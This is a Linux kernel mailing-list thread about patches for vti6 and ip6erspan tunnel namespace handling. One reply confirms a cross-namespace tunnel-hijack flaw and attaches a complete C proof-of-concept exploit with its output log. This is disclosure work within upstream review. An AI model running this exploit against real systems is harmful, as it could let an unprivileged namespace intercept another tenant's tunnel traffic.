  0 siblings, 0 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-04-30 10:06 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: netdev, kuniyu, shaw.leon, davem, edumazet, pabeni, dsahern,
	kuznet, linux-kernel, stable, security

Hi Kuniyuki, Xiao, Eric, Jakub,

Sorry for the delay, I had a fever yesterday.

Thanks for the reviews.

> Kuniyuki:
> nit: Please keep reverse xmas tree order, and you can reuse *t below.
> nit: Reported-by is not needed if it's same with SOB.

Both noted. v2 reuses *t and drops the Reported-by trailer.

> Xiao:
> > Fixes: 5e72ce3e3980 ...
> But why is 5e72ce3e3980 mentioned here? It neither introduced nor
> was intended to fix this bug.
> Maybe 2d665034f239 ("net: ip6_gre: Fix ip6erspan hlen calculation")
> which initially introduced ip6erspan_changelink

5e72ce3e3980 was the wrong anchor. 2d665034f239 introduced
ip6erspan_changelink with the dev_net(dev) shape. v2 uses that as the
Fixes target.

> Jakub:
> > While reviewing this area, I noticed a regression further down
> > in ip6erspan_changelink() regarding the metadata tunnel
> > unlinking.

The ip6gre_tunnel_unlink_md / ip6erspan_tunnel_unlink_md naming
asymmetry is real. Whether collect_md_tun_erspan ends up dangling and
reachable by ip6gre_tunnel_lookup() requires tracing I have not yet
done. v2 stays scoped to the dev_net conversion. The unlink_md side is
better handled in a separate patch.

v2 sent on netdev as a separate thread.

Maoyi

^ permalink raw reply	[flat|nested] 13+ messages in thread

* Re: [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink().
  2026-04-30  1:18   ` Jakub Kicinski
@ 2026-05-04  5:51     ` Maoyi Xie
  0 siblings, 0 replies; 13+ messages in thread
From: Maoyi Xie @ 2026-05-04  5:51 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: netdev, kuniyu, shaw.leon, davem, edumazet, pabeni, dsahern,
	kuznet, linux-kernel, stable, security

[-- Attachment #1: Type: text/plain, Size: 3052 bytes --]

On 4/30/26, Jakub Kicinski wrote (forwarding AI review):
> Because the collision check occurs in the new namespace (dev_net(dev)), but
> vti6_update() now modifies the original namespace's hash table (t->net),
> could an attacker in the new namespace configure their tunnel to perfectly
> match the parameters of an existing victim tunnel in the original namespace?
>
> Since the check in the new namespace finds no collision, it seems it bypasses
> the error check. Then vti6_update() prepends the attacker's tunnel
> into the original namespace's hash table, which might allow intercepting or
> hijacking traffic destined for the victim tunnel.

Confirmed empirically. PoC reproduces on a v7.0 kernel with the
posted 1/2 patch applied.

Setup:
  1. Real init_net root creates a victim tunnel "vti_victim" with
     laddr=fc00::1 raddr=fc00::a in init_net. An attacker tunnel
     "vti_attacker" with different params (laddr=fc00::100
     raddr=fc00::200) also in init_net.
  2. fork() a child that unshare(CLONE_NEWUSER | CLONE_NEWNET) and
     becomes "root" only in its own user_ns.
  3. Real root migrates vti_attacker into the child's netns via
     "ip link set vti_attacker netns <cpid>".
  4. Child issues SIOCCHGTUNNEL on vti_attacker with new params equal
     to vti_victim's (laddr=fc00::1 raddr=fc00::a).

Result on init_net's hash for params=fc00::1/fc00::a:

    [child] SIOCCHGTUNNEL succeeded
    [parent] SIOCGETTUNNEL on init_net's ip6_vti0 with
             params=fc00::1/fc00::a returns name='vti_attacker'

So vti6_locate(init_net, victim_params, 0) now returns the attacker's
tunnel rather than the victim's. The mechanics match the review:

  - vti6_siocdevprivate runs net = dev_net(dev) = child_netns.
  - vti6_locate(child_netns, victim_params) finds nothing.
  - else branch: t = netdev_priv(attacker_dev).
  - vti6_update(t, victim_params) under the 1/2 patch operates on
    t->net = init_net:
      vti6_tnl_unlink(init_net's ip6n, t)   ; t was linked there
      vti6_tnl_change(t, victim_params)
      vti6_tnl_link(init_net's ip6n, t)     ; prepend at head
  - init_net's bucket-for-victim_params chain is now
        attacker (head) -> victim
  - Subsequent matches in init_net resolve to the attacker.

Once an inbound xfrm packet matches victim_params in init_net, the
attacker's tunnel handles rcv/xmit, with t->dev still in the child
netns. So packets destined for the victim are delivered through
the attacker's dev in a netns the attacker fully controls.

Switching vti6_siocdevprivate() to use t->net for the collision
check (or doing the check after vti6_update() under the same lock
that vti6_update is already serialised by) closes the gap, mirroring
what 1/2 already does for vti6_changelink and vti6_update.

Happy to send a follow-up patch if you would prefer me to take it
on, or to wait for v2 of the series. Whichever works for you.

PoC source and the run output above are in poc_vti6_hijack.c and
poc_log.txt, attached.

Best regards,
Maoyi
Nanyang Technological University
https://maoyixie.com/

[-- Attachment #2: poc_log.txt --]
[-- Type: text/plain, Size: 976 bytes --]

[*] Clean prior tunnels (best effort)
[!] cmd 'ip link del vti_victim 2>/dev/null' rc=256
[!] cmd 'ip link del vti_attacker 2>/dev/null' rc=256
[*] Create victim tunnel vti_victim with laddr=fc00::1 raddr=fc00::a
[*] Create attacker tunnel vti_attacker with laddr=fc00::100 raddr=fc00::200
[child] uid=0 netns=net:[4026532261]
[parent] migrating vti_attacker to child netns (pid=417)
[child] attacker tunnel migrated to my netns
13: vti_attacker@NONE: <POINTOPOINT,NOARP> mtu 1460 qdisc noop state DOWN mode DEFAULT group default qlen 1000
[child] SIOCCHGTUNNEL: change vti_attacker params to victim's (laddr=fc00::1 raddr=fc00::a)
[child] SIOCCHGTUNNEL succeeded

[*] Verification: SIOCGETTUNNEL in init_net on params=fc00::1/fc00::a
[parent] SIOCGETTUNNEL returned tunnel name='vti_attacker'

*** HIJACK CONFIRMED: init_net's vti6 hash for params=fc00::1/fc00::a now resolves to attacker dev 'vti_attacker' (was 'vti_victim'). Cross-netns traffic-hijack window is real. ***

[-- Attachment #3: poc_vti6_hijack.c --]
[-- Type: application/octet-stream, Size: 10234 bytes --]

/*
 * PoC for cross-netns vti6 traffic-hijack window opened by
 * vti6_changelink/vti6_update fix when vti6_siocdevprivate() is left
 * using dev_net(dev) for collision check.
 *
 * Setup (all run by real init_net root):
 *   1. Create victim vti6 tunnel V_DEV in init_net with params P_V.
 *   2. Create attacker vti6 tunnel A_DEV in init_net with DIFFERENT params P_A.
 *   3. fork() child; child unshare(CLONE_NEWUSER | CLONE_NEWNET);
 *      writes 0-mapped uid_map for fake-root in child user_ns.
 *   4. Real root migrates A_DEV into child's netns: ip link set A_DEV netns <CPID>.
 *
 * Trigger (run by child as fake-root in user_ns + child netns):
 *   5. Open AF_INET6 SOCK_DGRAM, issue SIOCCHGTUNNEL on A_DEV with params = P_V.
 *
 * On a v7.0 kernel with the bug-#1 fix applied to vti6_update()
 * but vti6_siocdevprivate() still using dev_net(dev):
 *   - vti6_locate(net=dev_net(A_DEV)=child_netns, P_V, 0) finds nothing
 *     (V is in init_net, not child_netns).
 *   - else branch: t = netdev_priv(A_DEV) = attacker tunnel.
 *   - vti6_update(t, P_V, 0) operates on t->net = init_net:
 *       vti6_tnl_unlink(init_net's vti6_net, t)  ; t was linked there
 *       vti6_tnl_change(t, P_V)                  ; t->parms = P_V
 *       vti6_tnl_link(init_net's vti6_net, t)    ; prepend to init_net's bucket for P_V
 *     Now init_net's bucket-for-P_V chain is: [t (attacker, head)] -> [V (victim)].
 *
 * Verification (real init_net root):
 *   6. SIOCGETTUNNEL on init_net's fb_tnl_dev (ip6_vti0) with params=P_V.
 *      Kernel walks vti6_locate(init_net, P_V, 0) and returns the head of
 *      the chain. The returned name field tells us which tunnel "won":
 *         "vti_victim"   -> no hijack
 *         "vti_attacker" -> HIJACK CONFIRMED
 *
 * Build: gcc poc_vti6_hijack.c -o poc_vti6_hijack
 * Run as real root in init_net.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <linux/if.h>
#include <linux/ip6_tunnel.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* SIOCDEVPRIVATE family for vti6 */
#ifndef SIOCADDTUNNEL
#define SIOCADDTUNNEL    (SIOCDEVPRIVATE + 1)
#define SIOCDELTUNNEL    (SIOCDEVPRIVATE + 2)
#define SIOCCHGTUNNEL    (SIOCDEVPRIVATE + 3)
#define SIOCGETTUNNEL    (SIOCDEVPRIVATE + 0)
#endif

#define VICTIM_NAME   "vti_victim"
#define ATTACKER_NAME "vti_attacker"

/* victim params: laddr=fc00::1, raddr=fc00::a */
static void set_victim_params(struct ip6_tnl_parm2 *p)
{
    memset(p, 0, sizeof(*p));
    inet_pton(AF_INET6, "fc00::1", &p->laddr);
    inet_pton(AF_INET6, "fc00::a", &p->raddr);
    p->proto = 0; /* unspec */
    p->encap_limit = 4;
    p->hop_limit = 64;
    p->flowinfo = 0;
    p->flags = 0;
    p->link = 0;
    p->i_key = 0;
    p->o_key = 0;
}

/* attacker params: different laddr/raddr so it lands in a different bucket */
static void set_attacker_params(struct ip6_tnl_parm2 *p)
{
    memset(p, 0, sizeof(*p));
    inet_pton(AF_INET6, "fc00::100", &p->laddr);
    inet_pton(AF_INET6, "fc00::200", &p->raddr);
    p->proto = 0;
    p->encap_limit = 4;
    p->hop_limit = 64;
}

static int run_cmd(const char *cmd)
{
    int rc = system(cmd);
    if (rc != 0)
        fprintf(stderr, "[!] cmd '%s' rc=%d\n", cmd, rc);
    return rc;
}

static int do_chg_tunnel(const char *ifname, struct ip6_tnl_parm2 *new_p)
{
    struct ifreq ifr;
    int s, rc;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket(AF_INET6)"); return -1; }
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);
    ifr.ifr_ifru.ifru_data = (void *)new_p;
    /* p->name should be the device's current name; but vti6_parm_from_user
     * doesn't strictly require it. Set it just to be safe. */
    strncpy(new_p->name, ifname, IFNAMSIZ - 1);
    rc = ioctl(s, SIOCCHGTUNNEL, &ifr);
    close(s);
    return rc;
}

static int do_get_tunnel_via_fb(struct ip6_tnl_parm2 *want_p,
                                struct ip6_tnl_parm2 *out_p)
{
    /* SIOCGETTUNNEL on the fallback device "ip6_vti0" performs
     * vti6_locate(init_net, want_p, 0). */
    struct ifreq ifr;
    int s, rc;
    s = socket(AF_INET6, SOCK_DGRAM, 0);
    if (s < 0) { perror("socket(AF_INET6)"); return -1; }
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, "ip6_vti0", IFNAMSIZ - 1);
    *out_p = *want_p;
    /* clear name field so kernel returns the tunnel's actual name */
    memset(out_p->name, 0, sizeof(out_p->name));
    ifr.ifr_ifru.ifru_data = (void *)out_p;
    rc = ioctl(s, SIOCGETTUNNEL, &ifr);
    close(s);
    return rc;
}

int main(void)
{
    int rc;
    struct ip6_tnl_parm2 victim_p, attacker_p, lookup_p;

    /* Step 1: ensure clean state */
    fprintf(stderr, "[*] Clean prior tunnels (best effort)\n");
    run_cmd("ip link del " VICTIM_NAME " 2>/dev/null");
    run_cmd("ip link del " ATTACKER_NAME " 2>/dev/null");

    /* Step 2: create victim tunnel in init_net */
    set_victim_params(&victim_p);
    fprintf(stderr, "[*] Create victim tunnel %s with laddr=fc00::1 raddr=fc00::a\n",
            VICTIM_NAME);
    rc = run_cmd("ip -6 tunnel add " VICTIM_NAME " mode vti6 "
                 "remote fc00::a local fc00::1");
    if (rc) { fprintf(stderr, "[!] failed to create victim tunnel\n"); return 2; }
    run_cmd("ip link set " VICTIM_NAME " up");

    /* Step 3: create attacker tunnel in init_net (with different params) */
    set_attacker_params(&attacker_p);
    fprintf(stderr, "[*] Create attacker tunnel %s with laddr=fc00::100 raddr=fc00::200\n",
            ATTACKER_NAME);
    rc = run_cmd("ip -6 tunnel add " ATTACKER_NAME " mode vti6 "
                 "remote fc00::200 local fc00::100");
    if (rc) { fprintf(stderr, "[!] failed to create attacker tunnel\n"); return 2; }

    /* Step 4: fork the attacker child */
    int p2c[2], c2p[2];
    if (pipe(p2c) || pipe(c2p)) { perror("pipe"); return 2; }
    pid_t cpid = fork();
    if (cpid < 0) { perror("fork"); return 2; }

    if (cpid == 0) {
        /* === CHILD === */
        close(p2c[1]); close(c2p[0]);
        if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
            perror("[child] unshare(NEWUSER|NEWNET)"); _exit(2);
        }
        char b[64]; int fd, n;
        if ((fd = open("/proc/self/setgroups", O_WRONLY)) >= 0) {
            write(fd, "deny", 4); close(fd);
        }
        fd = open("/proc/self/uid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);
        fd = open("/proc/self/gid_map", O_WRONLY);
        n = snprintf(b, sizeof(b), "0 0 1\n"); write(fd, b, n); close(fd);

        char nsa[64]; int rl = readlink("/proc/self/ns/net", nsa, 63);
        if (rl > 0) nsa[rl] = 0;
        fprintf(stderr, "[child] uid=%u netns=%s\n", getuid(), nsa);

        /* Tell parent to migrate attacker tunnel here */
        write(c2p[1], "READY", 5);
        char tmp[8];
        read(p2c[0], tmp, sizeof(tmp));
        fprintf(stderr, "[child] attacker tunnel migrated to my netns\n");

        /* Confirm we see attacker tunnel here */
        run_cmd("ip link show " ATTACKER_NAME " 2>&1 | head -1");

        /* Issue SIOCCHGTUNNEL on attacker dev with VICTIM params */
        struct ip6_tnl_parm2 new_p;
        set_victim_params(&new_p);
        fprintf(stderr, "[child] SIOCCHGTUNNEL: change %s params to victim's "
                "(laddr=fc00::1 raddr=fc00::a)\n", ATTACKER_NAME);
        rc = do_chg_tunnel(ATTACKER_NAME, &new_p);
        if (rc < 0)
            fprintf(stderr, "[child] SIOCCHGTUNNEL rc=%d errno=%d (%s)\n",
                    rc, errno, strerror(errno));
        else
            fprintf(stderr, "[child] SIOCCHGTUNNEL succeeded\n");

        /* Tell parent we are done */
        write(c2p[1], "DONE", 4);
        /* Stay alive so attacker dev / netns persists for parent's check */
        char wait[8];
        read(p2c[0], wait, sizeof(wait));
        _exit(0);
    }

    /* === PARENT === */
    close(p2c[0]); close(c2p[1]);
    char tmp[8];
    read(c2p[0], tmp, sizeof(tmp)); /* wait for child READY */
    fprintf(stderr, "[parent] migrating %s to child netns (pid=%d)\n",
            ATTACKER_NAME, cpid);
    char migrate_cmd[128];
    snprintf(migrate_cmd, sizeof(migrate_cmd),
             "ip link set " ATTACKER_NAME " netns %d", cpid);
    rc = run_cmd(migrate_cmd);
    if (rc) { fprintf(stderr, "[parent] migration failed\n"); kill(cpid,SIGKILL); return 2; }

    write(p2c[1], "GO", 2);
    read(c2p[0], tmp, sizeof(tmp)); /* wait for child DONE */

    /* Now check init_net's hash for victim params */
    fprintf(stderr, "\n[*] Verification: SIOCGETTUNNEL in init_net on "
            "params=fc00::1/fc00::a\n");
    set_victim_params(&victim_p);
    rc = do_get_tunnel_via_fb(&victim_p, &lookup_p);
    if (rc < 0) {
        fprintf(stderr, "[parent] SIOCGETTUNNEL rc=%d errno=%d (%s)\n",
                rc, errno, strerror(errno));
    } else {
        fprintf(stderr, "[parent] SIOCGETTUNNEL returned tunnel name='%s'\n",
                lookup_p.name);
        if (strcmp(lookup_p.name, ATTACKER_NAME) == 0) {
            fprintf(stderr, "\n*** HIJACK CONFIRMED: init_net's vti6 hash for "
                    "params=fc00::1/fc00::a now resolves to attacker dev '%s' "
                    "(was '%s'). Cross-netns traffic-hijack window is real. ***\n",
                    ATTACKER_NAME, VICTIM_NAME);
        } else if (strcmp(lookup_p.name, VICTIM_NAME) == 0) {
            fprintf(stderr, "\n[OK] No hijack: init_net hash still resolves to "
                    "victim '%s'. Either the SIOCCHGTUNNEL failed, or the kernel "
                    "has a guard not visible from code reading.\n",
                    VICTIM_NAME);
        } else {
            fprintf(stderr, "\n[?] Unexpected name='%s'\n", lookup_p.name);
        }
    }

    write(p2c[1], "EXIT", 4); /* let child exit */
    int st; waitpid(cpid, &st, 0);

    /* Cleanup */
    run_cmd("ip link del " VICTIM_NAME " 2>/dev/null");
    /* attacker dev is in child's netns which exited; should be cleaned up auto */

    return 0;
}

^ permalink raw reply	[flat|nested] 13+ messages in thread

end of thread, other threads:[~2026-05-04  5:51 UTC | newest]

Thread overview: 13+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-04-28 11:07 [PATCH net 0/2] ipv6: tunnel changelink: use cached netns pointer Maoyi Xie
2026-04-28 11:07 ` [PATCH net 1/2] ip6: vti: Use ip6_tnl.net in vti6_changelink() Maoyi Xie
2026-04-28 13:14   ` Eric Dumazet
2026-04-30  1:18   ` Jakub Kicinski
2026-05-04  5:51     ` Maoyi Xie
2026-04-28 11:07 ` [PATCH net 2/2] ip6_gre: Use cached t->net in ip6erspan_changelink() Maoyi Xie
2026-04-28 13:14   ` Eric Dumazet
2026-04-28 19:49   ` Kuniyuki Iwashima
2026-04-29  1:58   ` Xiao Liang
2026-04-29  2:00     ` Eric Dumazet
2026-04-29  2:38       ` Xiao Liang
2026-04-30  1:18   ` Jakub Kicinski
2026-04-30 10:06     ` Maoyi Xie

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox